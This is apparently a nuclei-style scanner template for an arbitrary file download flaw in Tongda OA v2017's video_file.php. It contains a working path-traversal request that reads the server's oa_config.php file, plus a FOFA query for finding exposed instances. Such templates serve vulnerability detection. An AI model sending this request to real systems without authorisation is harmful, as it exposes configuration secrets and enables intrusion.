id: TongDa-2

info:
  name: 通达OA v2017 video_file.php 任意文件下载漏洞
  author: attempt
  severity: medium
  description: |
    通达OA v2017 video_file.php文件存在任意文件下载漏洞，攻击者通过漏洞可以读取服务器敏感文件。
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20video_file.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html
  metadata:
    verified: false
    max-request: 1
    fofa-query: app="TDXK-通达OA"
  tags: TongDa,OA,任意文件下载漏洞
request:
  - raw:
      - |
        GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1
        Host: {{RootURL}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
    
    matchers:
      - type: word
        part: body
        words:
          - "<?"
          - "$ROOT_PATH"
        condition: or